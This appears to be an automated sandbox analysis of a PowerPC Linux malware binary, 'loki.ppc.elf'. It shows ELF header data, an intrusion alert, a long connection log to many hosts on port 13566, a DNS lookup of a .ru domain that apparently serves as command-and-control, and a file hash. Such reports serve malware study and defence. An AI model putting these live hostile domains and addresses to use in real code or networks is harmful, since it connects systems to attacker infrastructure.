            Machine:PowerPC
            Version Number:0x1
            Type:EXEC (Executable file)
            OS/ABI:UNIX - System V
            ABI Version:0
            Entry Point Address:0x100001f0
            Flags:0x0
            ELF Header Size:52
            Program Header Offset:52
            Program Header Size:32
            Number of Program Headers:3
            Section Header Offset:46488
            Section Header Size:40
            Number of Section Headers:12
            Header String Table Index:11
            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
            NULL0x00x00x00x00x0000
            .initPROGBITS0x100000940x940x240x00x6AX004
            .textPROGBITS0x100000b80xb80xacb80x00x6AX004
            .finiPROGBITS0x1000ad700xad700x200x00x6AX004
            .rodataPROGBITS0x1000ad900xad900x5640x00x2A004
            .ctorsPROGBITS0x1001b2f80xb2f80x80x00x3WA004
            .dtorsPROGBITS0x1001b3000xb3000x80x00x3WA004
            .dataPROGBITS0x1001b3100xb3100x2240x00x3WA008
            .sdataPROGBITS0x1001b5340xb5340x180x00x3WA004
            .sbssNOBITS0x1001b54c0xb54c0x580x00x3WA004
            .bssNOBITS0x1001b5a40xb54c0x110c0x00x3WA004
            .shstrtabSTRTAB0x00xb54c0x4b0x00x0001
            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
            LOAD0x00x100000000x100000000xb2f40xb2f46.23580x5R E0x10000.init .text .fini .rodata
            LOAD0xb2f80x1001b2f80x1001b2f80x2540x13b83.21890x6RW 0x10000.ctors .dtors .data .sdata .sbss .bss
            GNU_STACK0x00x00x00x00x00.00000x6RW 0x4

            Download Network PCAP: filteredfull

            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
            2025-01-19T03:52:57.822655+01002500034ET COMPROMISED Known Compromised or Hostile Host Traffic group 18283.222.191.9013566192.168.2.1342836TCP
            • Total Packets: 197
            • 13566 undefined
            • 53 (DNS)
            TimestampSource PortDest PortSource IPDest IP
            Jan 19, 2025 03:52:57.521219015 CET4548013566192.168.2.1383.222.143.218
            Jan 19, 2025 03:52:57.526565075 CET135664548083.222.143.218192.168.2.13
            Jan 19, 2025 03:52:57.526667118 CET4548013566192.168.2.1383.222.143.218
            Jan 19, 2025 03:52:57.542130947 CET4342413566192.168.2.1383.222.152.210
            Jan 19, 2025 03:52:57.547339916 CET135664342483.222.152.210192.168.2.13
            Jan 19, 2025 03:52:57.547396898 CET4342413566192.168.2.1383.222.152.210
            Jan 19, 2025 03:52:57.559035063 CET4342413566192.168.2.1383.222.152.210
            Jan 19, 2025 03:52:57.564073086 CET135664342483.222.152.210192.168.2.13
            Jan 19, 2025 03:52:57.564152956 CET4342413566192.168.2.1383.222.152.210
            Jan 19, 2025 03:52:57.575201988 CET5610013566192.168.2.1383.222.129.82
            Jan 19, 2025 03:52:57.580095053 CET135665610083.222.129.82192.168.2.13
            Jan 19, 2025 03:52:57.580151081 CET5610013566192.168.2.1383.222.129.82
            Jan 19, 2025 03:52:57.582454920 CET3779413566192.168.2.1383.222.162.35
            Jan 19, 2025 03:52:57.585428953 CET4368413566192.168.2.1383.222.77.61
            Jan 19, 2025 03:52:57.586627960 CET3508813566192.168.2.1383.222.255.25
            Jan 19, 2025 03:52:57.587356091 CET135663779483.222.162.35192.168.2.13
            Jan 19, 2025 03:52:57.587416887 CET3779413566192.168.2.1383.222.162.35
            Jan 19, 2025 03:52:57.590672016 CET135664368483.222.77.61192.168.2.13
            Jan 19, 2025 03:52:57.590743065 CET4368413566192.168.2.1383.222.77.61
            Jan 19, 2025 03:52:57.591634989 CET135663508883.222.255.25192.168.2.13
            Jan 19, 2025 03:52:57.591679096 CET3508813566192.168.2.1383.222.255.25
            Jan 19, 2025 03:52:57.599535942 CET3508813566192.168.2.1383.222.255.25
            Jan 19, 2025 03:52:57.601533890 CET3951413566192.168.2.1383.222.80.100
            Jan 19, 2025 03:52:57.604127884 CET3521413566192.168.2.1383.222.63.114
            Jan 19, 2025 03:52:57.604679108 CET135663508883.222.255.25192.168.2.13
            Jan 19, 2025 03:52:57.604729891 CET3508813566192.168.2.1383.222.255.25
            Jan 19, 2025 03:52:57.606606960 CET135663951483.222.80.100192.168.2.13
            Jan 19, 2025 03:52:57.606786966 CET3951413566192.168.2.1383.222.80.100
            Jan 19, 2025 03:52:57.609026909 CET135663521483.222.63.114192.168.2.13
            Jan 19, 2025 03:52:57.609119892 CET3521413566192.168.2.1383.222.63.114
            Jan 19, 2025 03:52:57.617618084 CET3364013566192.168.2.1383.222.36.180
            Jan 19, 2025 03:52:57.620186090 CET6070813566192.168.2.1383.222.37.148
            Jan 19, 2025 03:52:57.622258902 CET5376013566192.168.2.1383.222.206.240
            Jan 19, 2025 03:52:57.622684956 CET135663364083.222.36.180192.168.2.13
            Jan 19, 2025 03:52:57.622726917 CET3364013566192.168.2.1383.222.36.180
            Jan 19, 2025 03:52:57.624465942 CET3941213566192.168.2.1383.222.148.57
            Jan 19, 2025 03:52:57.625390053 CET135666070883.222.37.148192.168.2.13
            Jan 19, 2025 03:52:57.625430107 CET6070813566192.168.2.1383.222.37.148
            Jan 19, 2025 03:52:57.626549006 CET3963813566192.168.2.1383.222.175.144
            Jan 19, 2025 03:52:57.627270937 CET135665376083.222.206.240192.168.2.13
            Jan 19, 2025 03:52:57.627309084 CET5376013566192.168.2.1383.222.206.240
            Jan 19, 2025 03:52:57.629276037 CET3754013566192.168.2.1383.222.112.243
            Jan 19, 2025 03:52:57.629317045 CET135663941283.222.148.57192.168.2.13
            Jan 19, 2025 03:52:57.629365921 CET3941213566192.168.2.1383.222.148.57
            Jan 19, 2025 03:52:57.631402016 CET135663963883.222.175.144192.168.2.13
            Jan 19, 2025 03:52:57.631453991 CET3963813566192.168.2.1383.222.175.144
            Jan 19, 2025 03:52:57.631701946 CET5490013566192.168.2.1383.222.40.150
            Jan 19, 2025 03:52:57.633882999 CET5725413566192.168.2.1383.222.106.184
            Jan 19, 2025 03:52:57.634155989 CET135663754083.222.112.243192.168.2.13
            Jan 19, 2025 03:52:57.634206057 CET3754013566192.168.2.1383.222.112.243
            Jan 19, 2025 03:52:57.636533022 CET135665490083.222.40.150192.168.2.13
            Jan 19, 2025 03:52:57.636580944 CET5490013566192.168.2.1383.222.40.150
            Jan 19, 2025 03:52:57.636770964 CET3383813566192.168.2.1383.222.113.2
            Jan 19, 2025 03:52:57.638747931 CET135665725483.222.106.184192.168.2.13
            Jan 19, 2025 03:52:57.638796091 CET5725413566192.168.2.1383.222.106.184
            Jan 19, 2025 03:52:57.639836073 CET5634813566192.168.2.1383.222.138.242
            Jan 19, 2025 03:52:57.640564919 CET3375813566192.168.2.1383.222.84.45
            Jan 19, 2025 03:52:57.641711950 CET135663383883.222.113.2192.168.2.13
            Jan 19, 2025 03:52:57.641879082 CET3383813566192.168.2.1383.222.113.2
            Jan 19, 2025 03:52:57.643811941 CET3682413566192.168.2.1383.222.21.162
            Jan 19, 2025 03:52:57.644728899 CET135665634883.222.138.242192.168.2.13
            Jan 19, 2025 03:52:57.644785881 CET5634813566192.168.2.1383.222.138.242
            Jan 19, 2025 03:52:57.645457029 CET135663375883.222.84.45192.168.2.13
            Jan 19, 2025 03:52:57.645505905 CET3375813566192.168.2.1383.222.84.45
            Jan 19, 2025 03:52:57.646214962 CET4834813566192.168.2.1383.222.106.20
            Jan 19, 2025 03:52:57.647448063 CET5156413566192.168.2.1383.222.187.186
            Jan 19, 2025 03:52:57.648664951 CET3775213566192.168.2.1383.222.120.250
            Jan 19, 2025 03:52:57.648691893 CET135663682483.222.21.162192.168.2.13
            Jan 19, 2025 03:52:57.648737907 CET3682413566192.168.2.1383.222.21.162
            Jan 19, 2025 03:52:57.651026964 CET135664834883.222.106.20192.168.2.13
            Jan 19, 2025 03:52:57.651127100 CET4834813566192.168.2.1383.222.106.20
            Jan 19, 2025 03:52:57.652014017 CET5389613566192.168.2.1383.222.44.157
            Jan 19, 2025 03:52:57.652379036 CET135665156483.222.187.186192.168.2.13
            Jan 19, 2025 03:52:57.652591944 CET5156413566192.168.2.1383.222.187.186
            Jan 19, 2025 03:52:57.653577089 CET135663775283.222.120.250192.168.2.13
            Jan 19, 2025 03:52:57.653731108 CET3775213566192.168.2.1383.222.120.250
            Jan 19, 2025 03:52:57.653990984 CET4101013566192.168.2.1383.222.175.81
            Jan 19, 2025 03:52:57.655251026 CET4248613566192.168.2.1383.222.49.125
            Jan 19, 2025 03:52:57.656138897 CET4609413566192.168.2.1383.222.66.197
            Jan 19, 2025 03:52:57.657180071 CET135665389683.222.44.157192.168.2.13
            Jan 19, 2025 03:52:57.657238007 CET5389613566192.168.2.1383.222.44.157
            Jan 19, 2025 03:52:57.657289028 CET5632213566192.168.2.1383.222.182.241
            Jan 19, 2025 03:52:57.658876896 CET135664101083.222.175.81192.168.2.13
            Jan 19, 2025 03:52:57.658926964 CET4101013566192.168.2.1383.222.175.81
            Jan 19, 2025 03:52:57.660202980 CET135664248683.222.49.125192.168.2.13
            Jan 19, 2025 03:52:57.660275936 CET4248613566192.168.2.1383.222.49.125
            Jan 19, 2025 03:52:57.661077023 CET135664609483.222.66.197192.168.2.13
            Jan 19, 2025 03:52:57.661148071 CET4609413566192.168.2.1383.222.66.197
            Jan 19, 2025 03:52:57.662148952 CET135665632283.222.182.241192.168.2.13
            Jan 19, 2025 03:52:57.662199974 CET5632213566192.168.2.1383.222.182.241
            Jan 19, 2025 03:52:57.672700882 CET5632213566192.168.2.1383.222.182.241
            Jan 19, 2025 03:52:57.673069954 CET5925413566192.168.2.1383.222.85.39
            Jan 19, 2025 03:52:57.673492908 CET3761813566192.168.2.1383.222.229.126
            Jan 19, 2025 03:52:57.674073935 CET5497413566192.168.2.1383.222.189.79
            Jan 19, 2025 03:52:57.677840948 CET135665632283.222.182.241192.168.2.13
            Jan 19, 2025 03:52:57.677897930 CET5632213566192.168.2.1383.222.182.241
            Jan 19, 2025 03:52:57.678037882 CET135665925483.222.85.39192.168.2.13
            Jan 19, 2025 03:52:57.678098917 CET5925413566192.168.2.1383.222.85.39
            Jan 19, 2025 03:52:57.678329945 CET135663761883.222.229.126192.168.2.13
            Jan 19, 2025 03:52:57.678411007 CET3761813566192.168.2.1383.222.229.126
            Jan 19, 2025 03:52:57.678905964 CET135665497483.222.189.79192.168.2.13
            Jan 19, 2025 03:52:57.678952932 CET5497413566192.168.2.1383.222.189.79
            Jan 19, 2025 03:52:57.686218977 CET5497413566192.168.2.1383.222.189.79
            Jan 19, 2025 03:52:57.689302921 CET4324813566192.168.2.1383.222.54.46
            Jan 19, 2025 03:52:57.689989090 CET6036013566192.168.2.1383.222.82.192
            Jan 19, 2025 03:52:57.691155910 CET135665497483.222.189.79192.168.2.13
            Jan 19, 2025 03:52:57.691229105 CET5497413566192.168.2.1383.222.189.79
            Jan 19, 2025 03:52:57.694210052 CET135664324883.222.54.46192.168.2.13
            Jan 19, 2025 03:52:57.694255114 CET4324813566192.168.2.1383.222.54.46
            Jan 19, 2025 03:52:57.694890022 CET135666036083.222.82.192192.168.2.13
            Jan 19, 2025 03:52:57.694933891 CET6036013566192.168.2.1383.222.82.192
            Jan 19, 2025 03:52:57.705187082 CET4604213566192.168.2.1383.222.32.166
            Jan 19, 2025 03:52:57.708882093 CET3792013566192.168.2.1383.222.237.53
            Jan 19, 2025 03:52:57.710097075 CET135664604283.222.32.166192.168.2.13
            Jan 19, 2025 03:52:57.710184097 CET4604213566192.168.2.1383.222.32.166
            Jan 19, 2025 03:52:57.711461067 CET3279613566192.168.2.1383.222.72.87
            Jan 19, 2025 03:52:57.713547945 CET3660213566192.168.2.1383.222.74.4
            Jan 19, 2025 03:52:57.713784933 CET135663792083.222.237.53192.168.2.13
            Jan 19, 2025 03:52:57.713843107 CET3792013566192.168.2.1383.222.237.53
            Jan 19, 2025 03:52:57.715814114 CET4886813566192.168.2.1383.222.17.194
            Jan 19, 2025 03:52:57.716387987 CET135663279683.222.72.87192.168.2.13
            Jan 19, 2025 03:52:57.716439962 CET3279613566192.168.2.1383.222.72.87
            Jan 19, 2025 03:52:57.716974974 CET5198413566192.168.2.1383.222.254.61
            Jan 19, 2025 03:52:57.717689037 CET3468013566192.168.2.1383.222.95.173
            Jan 19, 2025 03:52:57.718358040 CET135663660283.222.74.4192.168.2.13
            Jan 19, 2025 03:52:57.718406916 CET3660213566192.168.2.1383.222.74.4
            Jan 19, 2025 03:52:57.718472004 CET4462413566192.168.2.1383.222.143.144
            Jan 19, 2025 03:52:57.720685005 CET135664886883.222.17.194192.168.2.13
            Jan 19, 2025 03:52:57.720745087 CET4886813566192.168.2.1383.222.17.194
            Jan 19, 2025 03:52:57.721801996 CET135665198483.222.254.61192.168.2.13
            Jan 19, 2025 03:52:57.721892118 CET5198413566192.168.2.1383.222.254.61
            Jan 19, 2025 03:52:57.722527981 CET135663468083.222.95.173192.168.2.13
            Jan 19, 2025 03:52:57.722613096 CET3468013566192.168.2.1383.222.95.173
            Jan 19, 2025 03:52:57.723272085 CET135664462483.222.143.144192.168.2.13
            Jan 19, 2025 03:52:57.723340988 CET4462413566192.168.2.1383.222.143.144
            Jan 19, 2025 03:52:57.729427099 CET4462413566192.168.2.1383.222.143.144
            Jan 19, 2025 03:52:57.730390072 CET4480613566192.168.2.1383.222.43.209
            Jan 19, 2025 03:52:57.732620955 CET3410013566192.168.2.1383.222.86.225
            Jan 19, 2025 03:52:57.733913898 CET3436013566192.168.2.1383.222.194.171
            Jan 19, 2025 03:52:57.734399080 CET135664462483.222.143.144192.168.2.13
            Jan 19, 2025 03:52:57.734453917 CET4462413566192.168.2.1383.222.143.144
            Jan 19, 2025 03:52:57.734771967 CET3541013566192.168.2.1383.222.8.167
            Jan 19, 2025 03:52:57.735224962 CET135664480683.222.43.209192.168.2.13
            Jan 19, 2025 03:52:57.735266924 CET4480613566192.168.2.1383.222.43.209
            Jan 19, 2025 03:52:57.737500906 CET135663410083.222.86.225192.168.2.13
            Jan 19, 2025 03:52:57.737631083 CET3410013566192.168.2.1383.222.86.225
            Jan 19, 2025 03:52:57.738775015 CET135663436083.222.194.171192.168.2.13
            Jan 19, 2025 03:52:57.738923073 CET3436013566192.168.2.1383.222.194.171
            Jan 19, 2025 03:52:57.739612103 CET135663541083.222.8.167192.168.2.13
            Jan 19, 2025 03:52:57.739666939 CET3541013566192.168.2.1383.222.8.167
            Jan 19, 2025 03:52:57.745340109 CET3794013566192.168.2.1383.222.41.198
            Jan 19, 2025 03:52:57.747090101 CET3792213566192.168.2.1383.222.247.95
            Jan 19, 2025 03:52:57.749247074 CET3641813566192.168.2.1383.222.244.73
            Jan 19, 2025 03:52:57.750256062 CET135663794083.222.41.198192.168.2.13
            Jan 19, 2025 03:52:57.750310898 CET3794013566192.168.2.1383.222.41.198
            Jan 19, 2025 03:52:57.750653028 CET5492613566192.168.2.1383.222.32.21
            Jan 19, 2025 03:52:57.751936913 CET4627613566192.168.2.1383.222.239.13
            Jan 19, 2025 03:52:57.751945972 CET135663792283.222.247.95192.168.2.13
            Jan 19, 2025 03:52:57.751998901 CET3792213566192.168.2.1383.222.247.95
            Jan 19, 2025 03:52:57.753736973 CET5891213566192.168.2.1383.222.74.56
            Jan 19, 2025 03:52:57.754158020 CET135663641883.222.244.73192.168.2.13
            Jan 19, 2025 03:52:57.754293919 CET3641813566192.168.2.1383.222.244.73
            Jan 19, 2025 03:52:57.755525112 CET135665492683.222.32.21192.168.2.13
            Jan 19, 2025 03:52:57.755580902 CET5492613566192.168.2.1383.222.32.21
            Jan 19, 2025 03:52:57.755947113 CET4310413566192.168.2.1383.222.101.148
            Jan 19, 2025 03:52:57.756917000 CET135664627683.222.239.13192.168.2.13
            Jan 19, 2025 03:52:57.757015944 CET4627613566192.168.2.1383.222.239.13
            Jan 19, 2025 03:52:57.757636070 CET5065013566192.168.2.1383.222.60.118
            Jan 19, 2025 03:52:57.758636951 CET135665891283.222.74.56192.168.2.13
            Jan 19, 2025 03:52:57.758682013 CET5891213566192.168.2.1383.222.74.56
            Jan 19, 2025 03:52:57.759711027 CET5350613566192.168.2.1383.222.87.58
            Jan 19, 2025 03:52:57.760776043 CET135664310483.222.101.148192.168.2.13
            Jan 19, 2025 03:52:57.760821104 CET4310413566192.168.2.1383.222.101.148
            Jan 19, 2025 03:52:57.761125088 CET5646813566192.168.2.1383.222.180.182
            Jan 19, 2025 03:52:57.762490034 CET135665065083.222.60.118192.168.2.13
            Jan 19, 2025 03:52:57.762531042 CET5065013566192.168.2.1383.222.60.118
            Jan 19, 2025 03:52:57.762876987 CET5775013566192.168.2.1383.222.232.67
            Jan 19, 2025 03:52:57.764533043 CET135665350683.222.87.58192.168.2.13
            Jan 19, 2025 03:52:57.764666080 CET5350613566192.168.2.1383.222.87.58
            Jan 19, 2025 03:52:57.764729977 CET3922213566192.168.2.1383.222.71.19
            Jan 19, 2025 03:52:57.766016006 CET135665646883.222.180.182192.168.2.13
            Jan 19, 2025 03:52:57.766063929 CET5646813566192.168.2.1383.222.180.182
            Jan 19, 2025 03:52:57.766712904 CET3605013566192.168.2.1383.222.20.157
            Jan 19, 2025 03:52:57.767627001 CET135665775083.222.232.67192.168.2.13
            Jan 19, 2025 03:52:57.767683983 CET5775013566192.168.2.1383.222.232.67
            Jan 19, 2025 03:52:57.768157005 CET5596613566192.168.2.1383.222.244.214
            Jan 19, 2025 03:52:57.769551992 CET135663922283.222.71.19192.168.2.13
            Jan 19, 2025 03:52:57.769598007 CET3922213566192.168.2.1383.222.71.19
            Jan 19, 2025 03:52:57.770315886 CET4235213566192.168.2.1383.222.72.253
            Jan 19, 2025 03:52:57.771625996 CET135663605083.222.20.157192.168.2.13
            Jan 19, 2025 03:52:57.771814108 CET3605013566192.168.2.1383.222.20.157
            Jan 19, 2025 03:52:57.772670984 CET3310013566192.168.2.1383.222.126.114
            Jan 19, 2025 03:52:57.773067951 CET135665596683.222.244.214192.168.2.13
            Jan 19, 2025 03:52:57.773123980 CET5596613566192.168.2.1383.222.244.214
            Jan 19, 2025 03:52:57.774234056 CET4997213566192.168.2.1383.222.195.117
            Jan 19, 2025 03:52:57.775206089 CET135664235283.222.72.253192.168.2.13
            Jan 19, 2025 03:52:57.775249958 CET4235213566192.168.2.1383.222.72.253
            Jan 19, 2025 03:52:57.776529074 CET5348213566192.168.2.1383.222.209.183
            Jan 19, 2025 03:52:57.777539015 CET135663310083.222.126.114192.168.2.13
            Jan 19, 2025 03:52:57.777625084 CET3310013566192.168.2.1383.222.126.114
            Jan 19, 2025 03:52:57.778096914 CET5409013566192.168.2.1383.222.190.241
            Jan 19, 2025 03:52:57.779031992 CET135664997283.222.195.117192.168.2.13
            Jan 19, 2025 03:52:57.779076099 CET4997213566192.168.2.1383.222.195.117
            Jan 19, 2025 03:52:57.779994011 CET5810213566192.168.2.1383.222.204.173
            Jan 19, 2025 03:52:57.781131029 CET3350413566192.168.2.1383.222.255.23
            Jan 19, 2025 03:52:57.781377077 CET135665348283.222.209.183192.168.2.13
            Jan 19, 2025 03:52:57.781424999 CET5348213566192.168.2.1383.222.209.183
            Jan 19, 2025 03:52:57.782942057 CET135665409083.222.190.241192.168.2.13
            Jan 19, 2025 03:52:57.782987118 CET5409013566192.168.2.1383.222.190.241
            Jan 19, 2025 03:52:57.783783913 CET5486813566192.168.2.1383.222.229.100
            Jan 19, 2025 03:52:57.784837008 CET135665810283.222.204.173192.168.2.13
            Jan 19, 2025 03:52:57.784883022 CET5810213566192.168.2.1383.222.204.173
            Jan 19, 2025 03:52:57.785976887 CET135663350483.222.255.23192.168.2.13
            Jan 19, 2025 03:52:57.786026955 CET3350413566192.168.2.1383.222.255.23
            Jan 19, 2025 03:52:57.786109924 CET6087813566192.168.2.1383.222.171.33
            Jan 19, 2025 03:52:57.788239956 CET5814213566192.168.2.1383.222.218.2
            Jan 19, 2025 03:52:57.789755106 CET4222413566192.168.2.1383.222.92.142
            Jan 19, 2025 03:52:57.790713072 CET3994613566192.168.2.1383.222.185.68
            Jan 19, 2025 03:52:57.791573048 CET5422413566192.168.2.1383.222.209.0
            Jan 19, 2025 03:52:57.792402983 CET3450613566192.168.2.1383.222.87.229
            Jan 19, 2025 03:52:57.793436050 CET5276813566192.168.2.1383.222.157.75
            Jan 19, 2025 03:52:57.793744087 CET135665486883.222.229.100192.168.2.13
            Jan 19, 2025 03:52:57.793773890 CET135666087883.222.171.33192.168.2.13
            Jan 19, 2025 03:52:57.793793917 CET5486813566192.168.2.1383.222.229.100
            Jan 19, 2025 03:52:57.793802977 CET135665814283.222.218.2192.168.2.13
            Jan 19, 2025 03:52:57.793819904 CET6087813566192.168.2.1383.222.171.33
            Jan 19, 2025 03:52:57.793951988 CET5814213566192.168.2.1383.222.218.2
            Jan 19, 2025 03:52:57.794218063 CET4529613566192.168.2.1383.222.188.229
            Jan 19, 2025 03:52:57.795406103 CET4618013566192.168.2.1383.222.72.58
            Jan 19, 2025 03:52:57.796361923 CET4509213566192.168.2.1383.222.87.11
            Jan 19, 2025 03:52:57.797342062 CET6052813566192.168.2.1383.222.175.41
            Jan 19, 2025 03:52:57.798384905 CET4092413566192.168.2.1383.222.195.109
            Jan 19, 2025 03:52:57.798692942 CET135664222483.222.92.142192.168.2.13
            Jan 19, 2025 03:52:57.798722982 CET135663994683.222.185.68192.168.2.13
            Jan 19, 2025 03:52:57.798743963 CET4222413566192.168.2.1383.222.92.142
            Jan 19, 2025 03:52:57.798751116 CET135665422483.222.209.0192.168.2.13
            Jan 19, 2025 03:52:57.798780918 CET135663450683.222.87.229192.168.2.13
            Jan 19, 2025 03:52:57.798788071 CET5422413566192.168.2.1383.222.209.0
            Jan 19, 2025 03:52:57.798810005 CET135665276883.222.157.75192.168.2.13
            Jan 19, 2025 03:52:57.798839092 CET3450613566192.168.2.1383.222.87.229
            Jan 19, 2025 03:52:57.798844099 CET5276813566192.168.2.1383.222.157.75
            Jan 19, 2025 03:52:57.798887968 CET3994613566192.168.2.1383.222.185.68
            Jan 19, 2025 03:52:57.799040079 CET135664529683.222.188.229192.168.2.13
            Jan 19, 2025 03:52:57.799088001 CET4529613566192.168.2.1383.222.188.229
            Jan 19, 2025 03:52:57.799159050 CET5506213566192.168.2.1383.222.26.143
            Jan 19, 2025 03:52:57.799789906 CET3365013566192.168.2.1383.222.26.25
            Jan 19, 2025 03:52:57.800311089 CET135664618083.222.72.58192.168.2.13
            Jan 19, 2025 03:52:57.800355911 CET4618013566192.168.2.1383.222.72.58
            Jan 19, 2025 03:52:57.800734043 CET5762013566192.168.2.1383.222.166.0
            Jan 19, 2025 03:52:57.801243067 CET135664509283.222.87.11192.168.2.13
            Jan 19, 2025 03:52:57.801280975 CET4509213566192.168.2.1383.222.87.11
            Jan 19, 2025 03:52:57.801707983 CET4627613566192.168.2.1383.222.125.82
            Jan 19, 2025 03:52:57.802220106 CET135666052883.222.175.41192.168.2.13
            Jan 19, 2025 03:52:57.802278996 CET6052813566192.168.2.1383.222.175.41
            Jan 19, 2025 03:52:57.803226948 CET135664092483.222.195.109192.168.2.13
            Jan 19, 2025 03:52:57.803272963 CET4092413566192.168.2.1383.222.195.109
            Jan 19, 2025 03:52:57.803342104 CET3808413566192.168.2.1383.222.33.88
            Jan 19, 2025 03:52:57.803944111 CET135665506283.222.26.143192.168.2.13
            Jan 19, 2025 03:52:57.803989887 CET5506213566192.168.2.1383.222.26.143
            Jan 19, 2025 03:52:57.804367065 CET5993013566192.168.2.1383.222.84.125
            Jan 19, 2025 03:52:57.804590940 CET135663365083.222.26.25192.168.2.13
            Jan 19, 2025 03:52:57.804675102 CET3365013566192.168.2.1383.222.26.25
            Jan 19, 2025 03:52:57.805332899 CET5112813566192.168.2.1383.222.230.13
            Jan 19, 2025 03:52:57.805645943 CET135665762083.222.166.0192.168.2.13
            Jan 19, 2025 03:52:57.805697918 CET5762013566192.168.2.1383.222.166.0
            Jan 19, 2025 03:52:57.806545019 CET4736013566192.168.2.1383.222.193.184
            Jan 19, 2025 03:52:57.806598902 CET135664627683.222.125.82192.168.2.13
            Jan 19, 2025 03:52:57.806673050 CET4627613566192.168.2.1383.222.125.82
            Jan 19, 2025 03:52:57.807411909 CET4172213566192.168.2.1383.222.13.24
            Jan 19, 2025 03:52:57.808159113 CET135663808483.222.33.88192.168.2.13
            Jan 19, 2025 03:52:57.808203936 CET3808413566192.168.2.1383.222.33.88
            Jan 19, 2025 03:52:57.809242964 CET135665993083.222.84.125192.168.2.13
            Jan 19, 2025 03:52:57.809295893 CET5993013566192.168.2.1383.222.84.125
            Jan 19, 2025 03:52:57.810272932 CET135665112883.222.230.13192.168.2.13
            Jan 19, 2025 03:52:57.810338974 CET5112813566192.168.2.1383.222.230.13
            Jan 19, 2025 03:52:57.811458111 CET135664736083.222.193.184192.168.2.13
            Jan 19, 2025 03:52:57.811506033 CET4736013566192.168.2.1383.222.193.184
            Jan 19, 2025 03:52:57.812215090 CET135664172283.222.13.24192.168.2.13
            Jan 19, 2025 03:52:57.812278986 CET4172213566192.168.2.1383.222.13.24
            Jan 19, 2025 03:52:57.817553043 CET4283613566192.168.2.1383.222.191.90
            Jan 19, 2025 03:52:57.822654963 CET135664283683.222.191.90192.168.2.13
            Jan 19, 2025 03:52:57.822916985 CET4283613566192.168.2.1383.222.191.90
            Jan 19, 2025 03:52:57.823642969 CET4283613566192.168.2.1383.222.191.90
            Jan 19, 2025 03:52:57.828882933 CET135664283683.222.191.90192.168.2.13
            Jan 19, 2025 03:52:57.829176903 CET4283613566192.168.2.1383.222.191.90
            Jan 19, 2025 03:52:57.834553957 CET135664283683.222.191.90192.168.2.13
            Jan 19, 2025 03:53:07.833956003 CET4283613566192.168.2.1383.222.191.90
            Jan 19, 2025 03:53:07.840413094 CET135664283683.222.191.90192.168.2.13
            Jan 19, 2025 03:53:08.045028925 CET135664283683.222.191.90192.168.2.13
            Jan 19, 2025 03:53:08.045233011 CET4283613566192.168.2.1383.222.191.90
            Jan 19, 2025 03:53:08.445049047 CET135664283683.222.191.90192.168.2.13
            Jan 19, 2025 03:53:08.445380926 CET4283613566192.168.2.1383.222.191.90
            Jan 19, 2025 03:54:08.503264904 CET4283613566192.168.2.1383.222.191.90
            Jan 19, 2025 03:54:08.508483887 CET135664283683.222.191.90192.168.2.13
            Jan 19, 2025 03:54:08.699491978 CET135664283683.222.191.90192.168.2.13
            Jan 19, 2025 03:54:08.699801922 CET4283613566192.168.2.1383.222.191.90
            Jan 19, 2025 03:54:09.442231894 CET135664283683.222.191.90192.168.2.13
            Jan 19, 2025 03:54:09.442678928 CET4283613566192.168.2.1383.222.191.90
            TimestampSource PortDest PortSource IPDest IP
            Jan 19, 2025 03:52:57.809637070 CET4930153192.168.2.138.8.8.8
            Jan 19, 2025 03:52:57.816600084 CET53493018.8.8.8192.168.2.13
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Jan 19, 2025 03:52:57.809637070 CET192.168.2.138.8.8.80xa794Standard query (0)secure-network-rebirthltd.ruA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Jan 19, 2025 03:52:57.816600084 CET8.8.8.8192.168.2.130xa794No error (0)secure-network-rebirthltd.ru83.222.191.90A (IP address)IN (0x0001)false

            System Behavior

            Start time (UTC):02:52:56
            Start date (UTC):19/01/2025
            Path:/tmp/loki.ppc.elf
            Arguments:/tmp/loki.ppc.elf
            File size:5388968 bytes
            MD5 hash:ae65271c943d3451b7f026d1fadccea6

            Start time (UTC):02:52:56
            Start date (UTC):19/01/2025
            Path:/tmp/loki.ppc.elf
            Arguments:-
            File size:5388968 bytes
            MD5 hash:ae65271c943d3451b7f026d1fadccea6

            Start time (UTC):02:52:56
            Start date (UTC):19/01/2025
            Path:/tmp/loki.ppc.elf
            Arguments:-
            File size:5388968 bytes
            MD5 hash:ae65271c943d3451b7f026d1fadccea6